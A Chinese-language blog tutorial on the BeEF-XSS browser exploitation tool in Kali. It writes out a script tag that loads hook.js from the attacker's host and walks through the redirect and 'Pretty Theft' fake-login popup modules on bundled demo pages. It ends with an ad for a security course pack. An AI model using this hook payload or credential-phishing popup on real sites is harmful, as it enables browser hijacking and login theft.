2024年最新Beefxss使用教程图文教程（超详细）_怎么把beef改成公网ip

• 一、首次使用
• 二、修改账号密码
• 三、自带练习页面
• 四、简单使用
• 五、工具界面介绍
• 六、功能演示
• • 1、网页重定向
    • 2、社工弹窗
    • 3、功能颜色标识
• 七、工具原理

Beef-XSS是一款功能强大的
「XSS漏洞利用工具」，kali自带，基于Ruby语言开发。

一、首次使用

在kali中搜索 beefxss，就能找到。

单击打开，会自动运行「beef-xss 服务」，并打开Web界面。

提示：如果弹出的Web界面提示链接失败，可以关掉终端命令行，重新打开一次beef xss。

换成kali虚拟机的IP，也可以在物理机上访问Web界面：http://127.0.0.1:3000/ui/panel

二、修改账号密码

初次使用会让你设置密码，如果密码忘了，可以到 /usr/share/beef-xss/config.yaml 查看，这是Beff-xx的「配置文件」，用来保存版本、密码等配置信息。

修改密码可以直接修改文件中passwd这个字段，重启beef-xx服务后生效。

# 1、编辑配置文件，修改passwd字段
vim /usr/share/beef-xss/config.yaml
# 2、重启beef-xss服务
systemctl restart beef-xss

三、自带练习页面

Beef-xss自带两个「练习页面」：

1. http://127.0.0.1:3000/demos/basic.html
2. http://127.0.0.1:3000/demos/butcher/index.html

复制链接到kali虚拟机即可访问。

如果想在物理机访问，就把链接中的IP改成kali虚拟机的IP。

四、简单使用

Beef-xss的打开界面中，给我们提供了一个范例，我们在目标网页「提交」这行JS代码，就可以使用工具了。

提交的时候记得把IP改成部署Beff-xss的主机IP。

我们拿第一个练习页面来举例，提交代码 <script src="http://192.168.31.101:3000/hook.js"></script>。

提交后，Beff-xss的Web界面，会多出一个「在线浏览器」。

把练习页面关掉，这个IP就会从在线浏览器中消失，进入「离线浏览器」。

再次打开练习页面，就会重新进入在线浏览器。

这就意味着，提交了XSS的网页，只有打开时，才可以被利用，关掉就不可利用。

五、工具界面介绍

beef-XSS界面有很多栏，重点是 Commands 栏的功能指令，其他的基本用不到，不用太留意。

1. Online Browsers：在线浏览器，工具定时发送链接请求，链接成功就会显示在这里。
2. Offline Browsers：离线浏览器
3. Getting Started：入门指南，官方的一些文档
4. Logs：日志，记录工具做过哪些操作
5. Zombies：僵尸，记录可以利用的目标站点
6. Current Browser：上线的浏览器，只有在目标在线的时候才会显示出来。
7. Details：细节，展示目标的IP、版本等信息
8. Logs：日志，记录目标浏览器做过哪些操作
9. Commands：指令，工具的核心，不同的指令对应不同的操作
   – Module Tree：模块树，可以使用的模块功能
   – Module Result History：模块使用记录
   – XXX：指令描述，解释这个功能是干什么用的，怎么使用

六、功能演示

beef-XSS的 Commands 栏提供了很多功能，这里拿两个常用的功能给大家演示一下，功能应该如何使用。

以下演示的功能使用beef-XSS自带的练习网页 http://127.0.0.1:3000/demos/basic.html

请先按照四章节，提交XSS代码后，才可以使用功能。

1、网页重定向

Commands 栏搜索 redirect，点击 Redirect Browser 模块，右侧 Redirect URL 中输入要跳转的网址，点右下角 Execute。

切换到目标页面，会发现它正在跳转或已经跳转到了指定页面。

2、社工弹窗

Commands 搜索 pretty，选中 Pretty Theft，右侧链接的IP改成部署Beef-xss的主机IP，点击Execute。

目标页面就会弹窗，提示会话超时，要求重新登录。

本人从事网路安全工作12年，曾在2个大厂工作过，安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过，对这个行业了解比较全面。

最近遍览了各种网络安全类的文章，内容参差不齐，其中不伐有大佬倾力教学，也有各种不良机构浑水摸鱼，在收到几条私信，发现大家对一套完整的系统的网络安全从学习路线到学习资料，甚至是工具有着不小的需求。

最后，我将这部分内容融会贯通成了一套282G的网络安全资料包，所有类目条理清晰，知识点层层递进，需要的小伙伴可以点击下方小卡片领取哦！下面就开始进入正题，如何从一个萌新一步一步进入网络安全行业。

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图，这里我给大家分享一份打磨了3个月，已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字，还是生动的视频教程更加适合零基础的同学们学习，这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然，当你入门之后，仅仅是视频教程已经不能满足你的需求了，你肯定需要学习各种工具的使用以及大量的实战项目，这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战，这里带来的是SRC资料&HW资料，毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底，我们的最终目的都是为了就业，所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过！

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！